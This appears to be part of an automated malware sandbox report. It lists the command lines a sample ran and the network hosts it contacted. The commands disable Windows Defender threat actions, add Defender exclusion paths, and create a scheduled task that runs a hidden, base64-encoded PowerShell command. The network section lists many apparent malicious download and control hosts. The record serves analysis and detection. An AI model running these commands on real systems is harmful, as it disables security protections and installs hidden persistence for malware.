"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\signed.exe

"C:\Users\Admin\AppData\Local\Temp\signed.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\ProgramData\MsDrvSrvc.exe

"C:\ProgramData\MsDrvSrvc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gnPdzlYCb" /SC once /ST 08:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gnPdzlYCb"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 804 -ip 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1164 -ip 1164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 12

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gnPdzlYCb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "raBkRkUFhLhqVOsAt" /SC once /ST 05:47:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IIxDORIMmvvtwMVt\hnASLnknHwflCYp\YHiRqDo.exe\" Jd /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "raBkRkUFhLhqVOsAt"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe

"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe" Name host ValueOnly True

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7472 -ip 7472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 484

Network

Country Destination Domain Proto
NL 20.190.160.132:443 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 193.233.185.125:80 tcp
NL 20.190.160.4:443 tcp
US 193.233.185.125:80 tcp
US 93.184.221.240:80 tcp
IE 20.50.80.210:443 tcp
NL 20.190.160.8:443 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 timetogof.at udp
RU 185.106.93.10:80 185.106.93.10 tcp
US 8.8.8.8:53 fdhjtnthdngnd.click udp
SC 185.215.113.15:80 185.215.113.15 tcp
RU 193.106.191.246:80 193.106.191.246 tcp
US 8.8.8.8:53 fantadentalperu.com udp
US 8.8.8.8:53 iranparsa-novin.com udp
NL 212.193.30.45:80 212.193.30.45 tcp
US 8.8.8.8:53 maper.info udp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 2.56.57.65:80 2.56.57.65 tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 188.114.96.0:80 fdhjtnthdngnd.click tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 188.114.96.0:443 fdhjtnthdngnd.click tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:80 maper.info tcp
KR 211.119.84.112:80 timetogof.at tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:443 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
IR 185.88.178.71:443 iranparsa-novin.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
CA 192.99.207.151:443 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 0310799b411df1c4f1b0f93033ffbddb.clo.footprintdns.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
BR 191.232.215.149:443 0310799b411df1c4f1b0f93033ffbddb.clo.footprintdns.com tcp
KR 211.119.84.112:80 timetogof.at tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
NL 20.190.160.134:443 tcp
US 93.184.220.29:80 tcp
US 204.79.197.203:80 api.msn.com tcp
NL 20.190.160.2:443 tcp
US 8.8.8.8:53 getmut-cleaner.online udp
RU 176.57.213.135:443 getmut-cleaner.online tcp
NL 20.190.160.6:443 tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.19.185.150:80 checkip.amazonaws.com tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.2ip.ua udp
DE 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 ushatamaiet.xyz udp
LV 94.140.112.166:80 ushatamaiet.xyz tcp
RU 94.26.226.51:80 94.26.226.51 tcp
US 8.8.8.8:53 4hmn.short.gy udp
DE 52.59.165.42:443 4hmn.short.gy tcp
US 8.8.8.8:53 blackhk1.beget.tech udp
US 8.8.8.8:53 jollygiunco.com udp
IT 31.11.32.193:443 jollygiunco.com tcp
RU 5.101.153.227:80 blackhk1.beget.tech tcp
RU 5.101.153.227:80 blackhk1.beget.tech tcp
US 8.8.8.8:53 www.jollygiunco.com udp
RU 5.101.153.227:80 blackhk1.beget.tech tcp
NL 85.202.169.116:80 85.202.169.116 tcp
IT 31.11.32.193:443 www.jollygiunco.com tcp
US 8.8.8.8:53 webkita.co.id udp
ID 103.153.3.19:80 webkita.co.id tcp
US 8.8.8.8:53 iplis.ru udp
DE 148.251.234.93:443 iplis.ru tcp
NL 2.56.57.65:80 2.56.57.65 tcp
UA 194.36.177.84:19999 tcp
ID 103.153.3.19:80 webkita.co.id tcp
RU 193.106.191.81:23196 tcp
ID 103.153.3.19:80 webkita.co.id tcp
ID 103.153.3.19:80 webkita.co.id tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 193.233.185.125:80 tcp
ID 103.153.3.19:80 webkita.co.id tcp
DE 94.130.188.83:80 94.130.188.83 tcp
SC 185.215.113.16:21921 tcp
ID 103.153.3.19:80 webkita.co.id tcp
US 8.8.8.8:53 yandex.ru udp
RU 77.88.55.60:443 yandex.ru tcp
DE 162.0.217.254:443 api.2ip.ua tcp
NL 45.141.237.38:80 45.141.237.38 tcp
ID 103.153.3.19:80 webkita.co.id tcp
US 8.8.8.8:53 monsutiur4.com udp
NL 185.237.206.60:80 monsutiur4.com tcp
NL 149.154.167.99:443 t.me tcp
DE 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 116.202.4.170:80 116.202.4.170 tcp
US 193.233.185.125:80 tcp
US 8.8.8.8:53 rgyui.top udp
US 8.8.8.8:53 acacaca.org udp
KR 211.171.233.129:80 acacaca.org tcp
BR 138.36.3.134:80 rgyui.top tcp
KR 211.171.233.129:80 acacaca.org tcp
DE 116.202.4.170:80 116.202.4.170 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
SC 185.215.113.75:81 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 climatejustice.social udp
DE 167.86.107.75:443 climatejustice.social tcp
LU 107.189.11.124:80 107.189.11.124 tcp
US 8.8.8.8:53 nusurionuy5ff.at udp
US 8.8.8.8:53 moroitomo4.net udp
US 8.8.8.8:53 susuerulianita1.net udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 cucumbetuturel4.com udp
US 8.8.8.8:53 nunuslushau.com udp
US 8.8.8.8:53 linislominyt11.at udp
NL 85.202.169.116:80 85.202.169.116 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
BR 138.36.3.134:80 linislominyt11.at tcp
US 8.8.8.8:53 tg8.cllgxx.com udp
US 8.8.8.8:53 i.xyzgamei.com udp
US 8.8.8.8:53 paisajeeto.in udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 188.114.96.0:80 fdhjtnthdngnd.click tcp
US 104.21.86.228:80 i.xyzgamei.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 188.114.96.0:443 fdhjtnthdngnd.click tcp
US 104.21.86.228:80 i.xyzgamei.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 85.209.157.230:80 tg8.cllgxx.com tcp
US 104.21.86.228:80 i.xyzgamei.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.86.228:443 i.xyzgamei.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 j.xyzgamej.com udp
US 104.21.75.107:443 j.xyzgamej.com tcp
US 8.8.8.8:53 paisajeeto.in udp
BR 138.36.3.134:80 linislominyt11.at tcp
US 143.198.104.158:80 tcp
FI 65.108.27.131:45256 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 v.xyzgamev.com udp
US 172.67.188.70:443 v.xyzgamev.com tcp
NL 85.202.169.116:80 85.202.169.116 tcp
DE 148.251.234.93:443 iplis.ru tcp
NL 45.141.237.38:80 45.141.237.38 tcp
US 8.8.8.8:53 f00d3193-7630-49d1-9951-20079dee8095.uuid.3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion udp
US 8.8.8.8:53 sofolisk.com udp
SC 185.215.113.15:80 185.215.113.15 tcp
BR 138.36.3.134:80 linislominyt11.at tcp
US 8.8.8.8:53 ghahantellorb.com udp
LV 94.140.114.84:80 ghahantellorb.com tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
DE 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 stun3.l.google.com udp
US 74.125.204.127:19302 stun3.l.google.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 sofolisk.com udp
SC 185.215.113.15:80 185.215.113.15 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
BR 138.36.3.134:80 linislominyt11.at tcp
DE 162.0.217.254:443 api.2ip.ua tcp
BR 138.36.3.134:80 linislominyt11.at tcp
US 8.8.8.8:53 kalitope-ci.com udp
FR 91.216.107.73:443 kalitope-ci.com tcp
AT 140.78.100.23:8443 tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
PL 95.214.54.70:8443 tcp
BR 138.36.3.134:80 linislominyt11.at tcp
DE 185.220.101.210:443 tcp
DE 185.220.101.196:8443 tcp
SE 98.128.173.1:9001 tcp
KR 211.171.233.129:80 acacaca.org tcp
BR 138.36.3.134:80 linislominyt11.at tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
FI 65.108.213.210:80 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc tcp
BR 138.36.3.134:80 linislominyt11.at tcp
US 8.8.8.8:53 amarillavida.com udp
US 206.221.182.74:443 amarillavida.com tcp
DE 185.220.101.210:443 tcp
SE 98.128.173.1:9001 tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
BR 138.36.3.134:80 linislominyt11.at tcp
US 8.8.8.8:53 agressivemnaiq.xyz udp
NL 2.58.149.158:80 agressivemnaiq.xyz tcp
US 8.8.8.8:53 cdn-130.anonfiles.com udp
SE 45.154.253.59:443 cdn-130.anonfiles.com tcp
US 8.8.8.8:53 anonfiles.com udp
SE 45.154.253.151:443 anonfiles.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 github.com udp
SC 185.215.113.15:80 185.215.113.15 tcp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 45.159.251.144:80 tcp
RU 185.106.93.10:80 185.106.93.10 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
FI 65.108.213.210:80 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc tcp
US 8.8.8.8:53 diewebseite.at udp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
NL 2.58.149.158:80 agressivemnaiq.xyz tcp
BG 151.251.24.5:80 diewebseite.at tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 54.72.247.209:80 checkip.amazonaws.com tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
RU 89.185.84.2:80 89.185.84.2 tcp
US 8.8.8.8:53 astrani.com udp
US 206.221.182.74:80 astrani.com tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
BG 151.251.24.5:80 diewebseite.at tcp
US 8.8.8.8:53 s-ring.msedge.net udp
US 13.107.3.254:443 s-ring.msedge.net tcp
US 13.107.3.254:443 s-ring.msedge.net tcp
US 131.253.33.200:443 www.bing.com tcp
